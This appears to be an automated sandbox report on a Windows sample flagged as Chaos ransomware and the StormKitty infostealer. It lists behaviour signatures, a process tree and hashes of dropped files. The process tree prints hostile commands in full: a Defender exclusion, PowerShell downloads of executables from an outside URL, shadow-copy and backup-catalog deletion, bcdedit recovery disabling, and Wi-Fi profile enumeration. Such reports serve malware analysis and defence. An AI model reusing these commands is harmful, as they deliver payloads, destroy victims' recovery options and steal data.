Analysis

  • max time kernel
    103s
  • max time network
    114s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20250314-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20250314-enlocale:en-usos:windows10-2004-x64system
  • submitted
    22/03/2025, 02:51

General

  • Target

    ZGZ3X_nig.exe

  • Size

    57KB

  • MD5

    16edd47bf01716b24958a0b3a3a7bcfb

  • SHA1

    8b7972f4190c2ca9d600084611e966fa0f899b98

  • SHA256

    568d485f89554f0a315d1f839e5e2b33c7735f9b3dc3892391bdaa16a3f480e8

  • SHA512

    9e6ca1cbfa194aff3aebb60fa7b73ee4ff63f9770cfe1d114b757d55693278ccb8f6a450235255a3ae03ac382b528b899eb973d571523fe12e3910b9568d38e1

  • SSDEEP

    768:d5qkvPJg++TldUQJbxc1knPItshRGibgFfYTrTQc1mRdJcWvFM79yipBvSrrCeao:3rPJVKjbcknWSOYvTfkWkFM79yQVFu/

Malware Config

Signatures

  • Chaos

    Ransomware family first seen in June 2021.

  • Chaos Ransomware 2 IoCs
  • Chaos family
  • StormKitty

    StormKitty is an open source info stealer written in C#.

  • StormKitty payload 2 IoCs
  • Stormkitty family
  • Deletes shadow copies 3 TTPs

    Ransomware often targets backup files to inhibit system recovery.

  • Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs
  • Blocklisted process makes network request 4 IoCs
  • Deletes backup catalog 3 TTPs 1 IoCs

    Uses wbadmin.exe to inhibit system recovery.

  • Disables Task Manager via registry modification
  • Downloads MZ/PE file 2 IoCs
  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops startup file 3 IoCs
  • Executes dropped EXE 3 IoCs
  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs

    Using powershell.exe command.

  • Drops desktop.ini file(s) 64 IoCs
  • Looks up external IP address via web service 2 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Sets desktop wallpaper using registry 2 TTPs 1 IoCs
  • UPX packed file 2 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Hide Artifacts: Ignore Process Interrupts 1 TTPs 2 IoCs

    Command interpreters often include specific commands/flags that ignore errors and other hangups.

  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Event Triggered Execution: Netsh Helper DLL 1 TTPs 6 IoCs

    Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

  • Program crash 1 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 8 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs

    Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.

  • Checks SCSI registry key(s) 3 TTPs 4 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Interacts with shadow copies 3 TTPs 1 IoCs

    Shadow copies are often targeted by ransomware to inhibit system recovery.

  • Modifies registry class 1 IoCs
  • Opens file in notepad (likely ransom note) 1 IoCs
  • Runs net.exe
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 55 IoCs
  • Suspicious use of WriteProcessMemory 60 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

  • Uses Volume Shadow Copy service COM API

    The Volume Shadow Copy service is used to manage backups/snapshots.

  • outlook_office_path 1 IoCs
  • outlook_win_path 1 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\ZGZ3X_nig.exe
    "C:\Users\Admin\AppData\Local\Temp\ZGZ3X_nig.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:4024
    • C:\Windows\system32\cmd.exe
      "C:\Windows\system32\cmd" /c "C:\Users\Admin\AppData\Local\Temp\473A.tmp\473B.tmp\473C.bat C:\Users\Admin\AppData\Local\Temp\ZGZ3X_nig.exe"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1620
      • C:\Windows\system32\net.exe
        net session
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:2816
        • C:\Windows\system32\net1.exe
          C:\Windows\system32\net1 session
          4⤵
            PID:2796
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell -NoProfile -ExecutionPolicy Bypass -Command "Set-MpPreference -ExclusionPath \"$env:TEMP\" -ErrorAction SilentlyContinue"
          3⤵
          • Command and Scripting Interpreter: PowerShell
          • Hide Artifacts: Ignore Process Interrupts
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2300
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell -NoProfile -ExecutionPolicy Bypass -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; iwr -Uri \"https://github.com/nfdsafnsdl/login/releases/download/V1/build.exe\" -OutFile \"C:\Users\Admin\AppData\Local\Temp\build.exe\" -ErrorAction Stop"
          3⤵
          • Blocklisted process makes network request
          • Downloads MZ/PE file
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:1912
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell -NoProfile -ExecutionPolicy Bypass -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; iwr -Uri \"https://github.com/nfdsafnsdl/login/releases/download/V1/kernelv.exe\" -OutFile \"C:\Users\Admin\AppData\Local\Temp\kernelv.exe\" -ErrorAction Stop"
          3⤵
          • Blocklisted process makes network request
          • Downloads MZ/PE file
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:1152
        • C:\Users\Admin\AppData\Local\Temp\build.exe
          "C:\Users\Admin\AppData\Local\Temp\build.exe"
          3⤵
          • Checks computer location settings
          • Executes dropped EXE
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:5028
          • C:\Users\Admin\AppData\Roaming\svchost.exe
            "C:\Users\Admin\AppData\Roaming\svchost.exe"
            4⤵
            • Checks computer location settings
            • Drops startup file
            • Executes dropped EXE
            • Drops desktop.ini file(s)
            • Sets desktop wallpaper using registry
            • Modifies registry class
            • Suspicious behavior: AddClipboardFormatListener
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:2132
            • C:\Windows\System32\cmd.exe
              "C:\Windows\System32\cmd.exe" /C vssadmin delete shadows /all /quiet & wmic shadowcopy delete
              5⤵
              • Suspicious use of WriteProcessMemory
              PID:3292
              • C:\Windows\system32\vssadmin.exe
                vssadmin delete shadows /all /quiet
                6⤵
                • Interacts with shadow copies
                PID:4480
              • C:\Windows\System32\Wbem\WMIC.exe
                wmic shadowcopy delete
                6⤵
                • Suspicious use of AdjustPrivilegeToken
                PID:5048
            • C:\Windows\System32\cmd.exe
              "C:\Windows\System32\cmd.exe" /C bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no
              5⤵
              • Suspicious use of WriteProcessMemory
              PID:2752
              • C:\Windows\system32\bcdedit.exe
                bcdedit /set {default} bootstatuspolicy ignoreallfailures
                6⤵
                • Modifies boot configuration data using bcdedit
                PID:2608
              • C:\Windows\system32\bcdedit.exe
                bcdedit /set {default} recoveryenabled no
                6⤵
                • Modifies boot configuration data using bcdedit
                PID:4300
            • C:\Windows\System32\cmd.exe
              "C:\Windows\System32\cmd.exe" /C wbadmin delete catalog -quiet
              5⤵
              • Suspicious use of WriteProcessMemory
              PID:3448
              • C:\Windows\system32\wbadmin.exe
                wbadmin delete catalog -quiet
                6⤵
                • Deletes backup catalog
                PID:2664
            • C:\Windows\system32\NOTEPAD.EXE
              "C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\AppData\Roaming\readme.txt
              5⤵
              • Opens file in notepad (likely ransom note)
              PID:1688
        • C:\Users\Admin\AppData\Local\Temp\kernelv.exe
          "C:\Users\Admin\AppData\Local\Temp\kernelv.exe"
          3⤵
          • Executes dropped EXE
          • Accesses Microsoft Outlook profiles
          • System Location Discovery: System Language Discovery
          • Checks processor information in registry
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          • outlook_office_path
          • outlook_win_path
          PID:1348
          • C:\Windows\SysWOW64\cmd.exe
            "cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All
            4⤵
            • System Location Discovery: System Language Discovery
            • System Network Configuration Discovery: Wi-Fi Discovery
            • Suspicious use of WriteProcessMemory
            PID:2816
            • C:\Windows\SysWOW64\chcp.com
              chcp 65001
              5⤵
              • System Location Discovery: System Language Discovery
              PID:3192
            • C:\Windows\SysWOW64\netsh.exe
              netsh wlan show profile
              5⤵
              • Event Triggered Execution: Netsh Helper DLL
              • System Location Discovery: System Language Discovery
              • System Network Configuration Discovery: Wi-Fi Discovery
              PID:4528
            • C:\Windows\SysWOW64\findstr.exe
              findstr All
              5⤵
              • System Location Discovery: System Language Discovery
              PID:4400
          • C:\Windows\SysWOW64\WerFault.exe
            C:\Windows\SysWOW64\WerFault.exe -u -p 1348 -s 2432
            4⤵
            • Program crash
            PID:4048
          • C:\Windows\SysWOW64\cmd.exe
            "cmd.exe" /C chcp 65001 && netsh wlan show networks mode=bssid
            4⤵
            • System Location Discovery: System Language Discovery
            • Suspicious use of WriteProcessMemory
            PID:1660
            • C:\Windows\SysWOW64\chcp.com
              chcp 65001
              5⤵
              • System Location Discovery: System Language Discovery
              PID:852
            • C:\Windows\SysWOW64\netsh.exe
              netsh wlan show networks mode=bssid
              5⤵
              • Event Triggered Execution: Netsh Helper DLL
              • System Location Discovery: System Language Discovery
              PID:5064
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell -NoProfile -ExecutionPolicy Bypass -Command "Remove-MpPreference -ExclusionPath \"$env:TEMP\" -ErrorAction SilentlyContinue"
          3⤵
          • Hide Artifacts: Ignore Process Interrupts
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:1140
    • C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 1348 -ip 1348
      1⤵
        PID:1420
      • C:\Windows\system32\vssvc.exe
        C:\Windows\system32\vssvc.exe
        1⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:2228
      • C:\Windows\system32\wbengine.exe
        "C:\Windows\system32\wbengine.exe"
        1⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:4988
      • C:\Windows\System32\vdsldr.exe
        C:\Windows\System32\vdsldr.exe -Embedding
        1⤵
          PID:1204
        • C:\Windows\System32\vds.exe
          C:\Windows\System32\vds.exe
          1⤵
          • Checks SCSI registry key(s)
          PID:2628

        Network

        MITRE ATT&CK Enterprise v15

        Replay Monitor

        Loading Replay Monitor...

        Downloads

        • C:\Users\Admin\2012_x64_1_vcRuntimeAdditional_x64.log

          Filesize

          1B

          MD5

          d1457b72c3fb323a2671125aef3eab5d

          SHA1

          5bab61eb53176449e25c2c82f172b82cb13ffb9d

          SHA256

          8a8de823d5ed3e12746a62ef169bcf372be0ca44f0a1236abc35df05d96928e1

          SHA512

          ca63c07ad35d8c9fb0c92d6146759b122d4ec5d3f67ebe2f30ddb69f9e6c9fd3bf31a5e408b08f1d4d9cd68120cced9e57f010bef3cde97653fed5470da7d1a0

        • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\build.exe.log

          Filesize

          226B

          MD5

          28d7fcc2b910da5e67ebb99451a5f598

          SHA1

          a5bf77a53eda1208f4f37d09d82da0b9915a6747

          SHA256

          2391511d0a66ed9f84ae54254f51c09e43be01ad685db80da3201ec880abd49c

          SHA512

          2d8eb65cbf04ca506f4ef3b9ae13ccf05ebefab702269ba70ffd1ce9e6c615db0a3ee3ac0e81a06f546fc3250b7b76155dd51241c41b507a441b658c8e761df6

        • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

          Filesize

          2KB

          MD5

          d85ba6ff808d9e5444a4b369f5bc2730

          SHA1

          31aa9d96590fff6981b315e0b391b575e4c0804a

          SHA256

          84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

          SHA512

          8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

          Filesize

          944B

          MD5

          a15743cd087226baafa094c9aed07dc4

          SHA1

          2124cf2ac13da80b2e3cd37d3eab477261771423

          SHA256

          4211b5503de68413f5605cbeec4a49fb46fbec44c58df95be892f0dc308a39cf

          SHA512

          301e82e45c3e190bdbc1316cda1cd735434c5aa873a57322e807c7cf4c23e006e11a7347ebb0f8afed181d3a4d860202cbd6fc721b9970296c7a4b1a367805a7

        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

          Filesize

          1KB

          MD5

          cd004cc33018d8896d50aea753fc075b

          SHA1

          063cf59c31ebca6e33d29d6e3062ef283c817924

          SHA256

          9e20a2341322632495af9aa46cfa78edeaa23bb1c72b948726eb9110ca6b22fb

          SHA512

          1fe32b73d8fab9aedf89de7b829f57087ec03718bd164303cf891e6d5804fc9a2bc16b485790bda90526fc8942b7edc7d0a567a8299ab879fe41376df71a445a

        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

          Filesize

          1KB

          MD5

          f5819e4332bfe20b154ef800c2da35c3

          SHA1

          6076c9167103e32cb21b7ba51c99b2dc7fa55af7

          SHA256

          f5fe04be666d575a4eacc7ddbfb1b172c303f9a841eb98a82067bd4cfea7403b

          SHA512

          9c99e560ea789549c82e8264e2c438cc6bb12a8facff5673f6c5dbde30db4417b7d951b659d88481624823d3f1b24c5238817f2344b4a1b084dfc12bb95e7b50

        • C:\Users\Admin\AppData\Local\Temp\212.102.63.147\Browsers\Firefox\FirefoxBookmarks.txt

          Filesize

          81B

          MD5

          ea511fc534efd031f852fcf490b76104

          SHA1

          573e5fa397bc953df5422abbeb1a52bf94f7cf00

          SHA256

          e5fe7f327ae62df007bd1117aa7f522dbbcd371ec67953f66d786424cb1d7995

          SHA512

          f7d8e575a2332b0fbd491b5e092b7ed6b0942a5165557fcc5d215d873b05103aa6ba01843133871c1c7ac81b10182a15895be49885c98d1a379dd55f88004fae

        • C:\Users\Admin\AppData\Local\Temp\212.102.63.147\System\Process.txt

          Filesize

          743B

          MD5

          d7d098677c341ae3eeb87981da76e427

          SHA1

          6a0909ca3adb29a1fb9265395be93b3538402024

          SHA256

          0fdfa0ce28a62e115f88672b865b1a4b60960485d43fb6d17ecb027c501388be

          SHA512

          0f5c428936690b0d1ecb68a81372caccc0c58e69d2b56d51d726ca1088a283a5631baf64b508f944f5871e387da8aca59f096b2fbc14f5583f8d6f6b7c33f4be

        • C:\Users\Admin\AppData\Local\Temp\473A.tmp\473B.tmp\473C.bat

          Filesize

          2KB

          MD5

          1c935ef28fdfd394b770d945d7f04d76

          SHA1

          29e251c3c40ce4ad1b2984bf26b444aa045d9b21

          SHA256

          aa58e1df5882878a44687853f47d10b655c3fe888ec20fb99446305f5d38c681

          SHA512

          a9e60f2ac4aec15a3ba0a95df224449f64777a027357792247dd597529542e79128aec996c89ff86a1654911b4b763c577d3c3d2f38c59b02b280b8ad824e7e1

        • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_th5qeduo.rpf.ps1

          Filesize

          60B

          MD5

          d17fe0a3f47be24a6453e9ef58c94641

          SHA1

          6ab83620379fc69f80c0242105ddffd7d98d5d9d

          SHA256

          96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

          SHA512

          5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

        • C:\Users\Admin\AppData\Local\Temp\build.exe

          Filesize

          137KB

          MD5

          7605fb5c749eeea0b1b27fdaad78051c

          SHA1

          28388bf016af085bbcbacf8c516853942f6ec8d3

          SHA256

          466a92e378a95752870abddd6af278fba89c5fef2cb3adfe2c4c114b9bd7cd93

          SHA512

          1a3780652e092bd0be5c45cf034b2d0737324009c4d7d74e5cca193f75f285be85fa1631a68c6955566206dc3d51ba2dab9c4acfc74f9652ed2c04976ae3ee54

        • C:\Users\Admin\AppData\Local\Temp\kernelv.exe

          Filesize

          211KB

          MD5

          b6054dbe4ed853c2e35291f045a632ba

          SHA1

          1355fbe1ea1f6bb566921f04512f78590c4b0e41

          SHA256

          b58d783278e142a6242ff79712a1af504098c9a930271419bbf381caf45e29c4

          SHA512

          648e714669a3434c68091e23c2921f1b535fff0c43402ea57b8c3903282ea885c43f57746772a23674abaf80885aa52b99ece38663f4c0200a9ee9823a752da0

        • C:\Users\Admin\readme.txt

          Filesize

          780B

          MD5

          60d646f40556d78166ad8111d850fc51

          SHA1

          babaaf0762000dbf4b3f7a93beb35b6d9279d94d

          SHA256

          a66f43f9660c0b16c59eb22b1037c19af06f89d875344446cc63e90437f78fab

          SHA512

          3fb8acd626a012402669e42e760dd5b0efe2d2a37f3e71310c4a80a14491ee973713fcb0d90f99d40f0749c1dd16e8153afcb757e25de34c9ec9c82a58e81bc6

        • memory/1348-70-0x0000000006780000-0x0000000006812000-memory.dmp

          Filesize

          584KB

        • memory/1348-67-0x0000000004C00000-0x0000000004DC2000-memory.dmp

          Filesize

          1.8MB

        • memory/1348-69-0x0000000006570000-0x00000000065D6000-memory.dmp

          Filesize

          408KB

        • memory/1348-62-0x00000000001F0000-0x000000000022C000-memory.dmp

          Filesize

          240KB

        • memory/1348-64-0x0000000004A10000-0x0000000004A22000-memory.dmp

          Filesize

          72KB

        • memory/1348-68-0x0000000005B80000-0x00000000060AC000-memory.dmp

          Filesize

          5.2MB

        • memory/2300-18-0x000001B0C8C90000-0x000001B0C8EAC000-memory.dmp

          Filesize

          2.1MB

        • memory/2300-19-0x00007FF8AA7A0000-0x00007FF8AB261000-memory.dmp

          Filesize

          10.8MB

        • memory/2300-15-0x00007FF8AA7A0000-0x00007FF8AB261000-memory.dmp

          Filesize

          10.8MB

        • memory/2300-14-0x00007FF8AA7A0000-0x00007FF8AB261000-memory.dmp

          Filesize

          10.8MB

        • memory/2300-13-0x000001B0C8C50000-0x000001B0C8C72000-memory.dmp

          Filesize

          136KB

        • memory/2300-3-0x00007FF8AA7A3000-0x00007FF8AA7A5000-memory.dmp

          Filesize

          8KB

        • memory/4024-66-0x0000000140000000-0x0000000140028000-memory.dmp

          Filesize

          160KB

        • memory/4024-0-0x0000000140000000-0x0000000140028000-memory.dmp

          Filesize

          160KB

        • memory/5028-50-0x0000000000A00000-0x0000000000A28000-memory.dmp

          Filesize

          160KB